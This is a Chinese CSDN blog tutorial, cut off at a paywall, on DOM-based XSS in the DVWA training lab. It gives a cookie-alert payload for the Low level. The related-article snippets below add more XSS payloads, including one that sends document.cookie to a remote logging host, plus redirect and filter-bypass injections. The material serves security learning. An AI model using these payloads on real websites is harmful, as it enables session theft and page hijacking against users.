通过DVWA学习DOM型XSS

最新推荐文章于 2024-08-17 16:48:35 发布
最新推荐文章于 2024-08-17 16:48:35 发布
阅读量4k 收藏 22
点赞数 9
分类专栏: Web安全 DVWA 漏洞 文章标签: DVWA DOM型XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ski_12/article/details/85648582
版权
本文详细介绍了DOM型XSS的概念,通过DVWA的Low、Medium、High和Impossible级别实例,展示了如何利用和防御DOM型XSS。重点讨论了通过innerHTML、document.write等属性触发XSS,并给出了窃取cookie、篡改页面和键盘记录的payload示例。
摘要由CSDN通过智能技术生成

下了个新版的DVWA看了下,发现新增了好几个Web漏洞类型,就玩一下顺便做下笔记,完善一下之前那篇很水的DOM XSS文章,虽然这个也很水 :)

基本概念

DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。

DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞,其触发不需要经过服务器端,也就是说,服务端的防御并不起作用。

在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,客户端的脚本程序可以通过DOM来动态修改页面内容,从客户端获取DOM中的数据并在本地执行。基于这个特性,就可以利用JS脚本来实现XSS漏洞的利用。

 

可能触发DOM型XSS的属性

document.referer属性

window.name属性

location属性

innerHTML属性

documen.write属性

······

 

Low级别

点击正常功能观察:

查看页面源码,可以看到以下框中的JS代码,从URL栏中获取default参数的值,这里是通过获取“default=”后面的字符串来实现的,然后直接写到option标签中,并没有对特殊字符进行任何的过滤:

可以明确,这是由document.write属性造成的DOM型XSS漏洞。

因为这段JS代码是本地执行的,获取本地输入的URL栏上的default参数再直接嵌入到option标签中的,因而可以直接往default参数注入XSS payload即可:

<script>alert(document.cookie)</script>

最低0.47元/天 解锁文章
Mi1k7ea
关注
专栏目录
DVWA平台反射XSS实验
KUKULI233的博客
05-24 426
反射XSS 一、概念 XSS(跨站脚本攻击),攻击WEB客户端 注入客户端脚本代码 可以做到盗取cookie,重定向等 脚本语言javascript 黑客给服务器发送一个JS脚本,服务器就会回一个页面,将这个页面发给用户,用户在访问服务器时就会被执行盗取cookie值的JS脚本,黑客监听即能看到 前几步相同,用户访问服务器时被重定向到第三方网站 二、使用场景: DVWA级别调到low 直接嵌入<script>alert(‘xss’)</script> 元素事件<body
dvwa xss漏洞
qq_51177088的博客
05-24 289
@[TOC](xss) 原理 个人觉得,是和sql有很大相似之处的,都是利用嵌入恶意代码造成注入,一般使用JavaScript进行构造 分类 反射 存储 DOM 注入及绕过 测试注入敏感字符被转义是否以及探测输出位置 是否需要闭合 内容若是在标签内则无需闭合,如果在标签属性则需要闭合标签后再输出 构造xss 在标签内: <script>alert(1);</script> 在属性内: "/><script>alert(1)</script>
web常见漏洞——XSS
最新发布
m0_64365018的博客
08-17 1276
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等,xss又分为了三种类分别为存储反射DOM
DVWA XSS漏洞
qq_49422880的博客
09-02 534
Reflected XSS Low medium high impossible Store XSS Low 这个场景就是模拟网络留言板的Xss注入,这里有两个对话框,我们都将我们的注入语句插入其中寻找注入点,发现注入点在我们所提交的内容<script>alert("mohe xss")</script>上,毕竟是Low所以直接过。 medium 审计一下代码,发现也只是一个简单的匹配过滤而已,双写绕过即可。而且注入点是在name那里,所以我们...
DVWA靶场存储XSS漏洞实验
weixin_44851588的博客
05-26 4843
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 来自菜鸟的一次简单分享,本次实验主要结合后台源代码讲解,梳理存储XSS实验的思路,如果存在问题,请各位大佬多多指导。 一、XSS基础 1.什么是XSSXSS(Cross-site scripting)被称为跨站脚本攻击,由于与层叠样式表的缩写一样,因此被缩写为XSS。 2.XSS漏洞...
【无标题】DVWA靶场之xss漏洞
weixin_46954909的博客
05-17 912
alert(1)
DVWA靶场笔记之xssDOM)原理
Alonegrief的博客
11-30 2483
原理: Xss又叫跨站脚本攻击。他指的是恶意攻击者往web页面插入恶意html代码,当用户浏览该页面之时,嵌入其中web的html代码会被执行,从而达到恶意的特殊目的 Xss漏洞分为三类: 一、 反射xss:非持久化,攻击者事先制作好攻击连接,需要欺骗用户自己去点击连接才能触发xss代码(服务器中没有这样的页面和内容),一般容易出现搜索页面 二、 存储xss:持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将存储到服务器中,每当有用户访问该页面
玩转DVWAXSS DOM
key01362000的博客
09-29 1075
DVWAXSS DOM攻击
通过DVWA学习反射XSS漏洞
Mi1k7ea
03-04 4892
XSS,全称cross-site scripting,是用于攻击Web客户端而不是服务器端,其最大的特点是能把恶意的JS或HTML代码注入到用户浏览的网页上。而XSS漏洞的存在,主要是由于Web应用程序对用户的输入没有进行严格的过滤所导致的,当攻击者把恶意代码注入到网页时,用户只要访问该网页就会执行其中的恶意代码。关于其更具体的描述在网上也很多资料这里就不多说了直接进行总结整合。 XSS漏洞
DVWA系列之XSS(跨站脚本攻击)——DOMXSS源码分析及漏洞利用
7Riven's blog
11-27 1465
DOMXSS Document Object Model 文本对象模xss、可能是存储也可能是反射、只决定于输出地方 在反射XSS中输入: <script>var img=document.createElement('img');img.src='http://192.168.232.130:88/log?'+escape(document.cookie);&...
DVWA靶机基于XSS(跨站脚本攻击)的实验
CSFMSKK的博客
06-28 833
书说前言:本文针对DVWA靶机实验,仅供参考。如有雷同,实属他抄。如有用于不轨途径,与本人毫无瓜葛。 XSS是一种发生在前端浏览器的漏洞。XSS某种意义上也是一种注入攻击,攻击者在页面注入恶意代码,当受害者访问网站该页面时,恶意代码就会在浏览器上执行。 XSS共有3种:反射、存储DOM。 反射: low级别:没有任何的过滤和检查,存在明显的XSS漏洞。 直接修改URL 然后执行 medium 对<script>做了黑名单限制 思路:抓包,利用双写和大小写混淆
DVWA靶机-反射性XSS漏洞(Reflected)
weixin_43726831的博客
10-24 4108
DVWA靶机-反射性XSS漏洞(Reflected) DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command Injection) DVWA靶机-文件包含漏洞(File Inclusion) DVWA靶机-文件上传漏洞(File uploads) DVWA靶机-跨站请求伪造(CSRF) XSS跨站脚本攻击 XS...
DVWA实验XSS反射(弱方法)
Killua
03-22 1145
1.low难度下1.先判断有误XSS漏洞输入&lt;script&gt;alert(/xss/)&lt;/script&gt;值得注意的是输入 &lt;script&gt;alert(xss)&lt;/script&gt; 没有反应显示如下恶意url为:http://localhost/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%2F...
DVWA XSS
部分学习记录
09-19 229
DOM Based Cross Site Scripting (XSS) low 打开是一个菜单选项,提交以后发现URL有参数,修改一下呢?成功了,那直接试一下xss脚本<script>alert(document.cookie);</script>,成功获取到cookie medium 构造代码<script>alert(document.cookie)</script>,没效果?应该是有过滤机制,试一下双写,还是不行,会不会是转义问题?直接利用URL编码
DVWA-xss
Darklord.W
04-09 311
低等级: <script>alert('XSS')</script> <a href='' οnclick=alert('xxx')>点击</a> 重定向 <script>window.location="http://www.baidu.com"</script> 获取cookie级...
DVWAxss
giun的博客
03-11 1003
一、反射(reflected) (一)、尝试low等级 输入正常数字,返回以下内容 再输入&amp;lt;xss&amp;gt;发现,只输出了hello 我们使用火狐的开发者工具查看下元素 发现hello的后面是一对xss标签 我们进行弹窗测试 输入&amp;lt;script&amp;gt;alert(/xss/)&amp;lt;/script&amp;gt; 发现弹窗,说明存在xss注入 介绍javaScript的3个弹
dvwa中的XSS攻击(反射)
qq_45653152的博客
06-13 1875
三种xss: 反射:需攻击者提前构造一个恶意链接,诱使用户点击(经后端,不经数据库) 存储:攻击者在论坛的楼层包含一段恶意代码,并且服务器未进行正确的过滤输出,造成浏览该页面的用户执行这段代码(经过后端与数据库) DOM:利用非法输入来闭合对应的HTML标签(不经过后端,是基于文档对象模的一种漏洞,是通过url传入参数去控制触发的) Xss(refiected反射) Low等级: 代码显示X-XSS-Protection:0(0: 表示关闭浏览器的XSS防护机制)即未实施任何防御措施,且对name没有任
dvwaXSS
qq_17762247的博客
06-14 349
一、 XSS简介 XSS(Cross site scripting,跨站脚本攻击),XSS的重点不在于跨站点,而在于脚本的执行,其原理是:攻击者在web页面中插入一些恶意的script代码,当用户浏览该页面时,嵌入到页面的scripte代码执行,达到攻击用户的目的。XSS攻击主要分为几类:反射、存储DOM-based,其中反射DOM-based归类为非持久性攻击,存储为持久性攻击。 二、反射 XSS 原理:攻击者通过特定的方式诱惑用户访问一个包含恶意代码的url,用户点击该url后,恶意
DVWA靶场深度解析:XSS攻击DOM、反射、存储实战
"该资源提供的是DVWA(Damn Vulnerable Web Application)靶场中的XSS漏洞实践,包括DOM、反射和存储三种类XSS攻击。适合网络安全学习者进行练习和理解XSS攻击的原理与防范方法。" 在Web安全领域,XSS...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值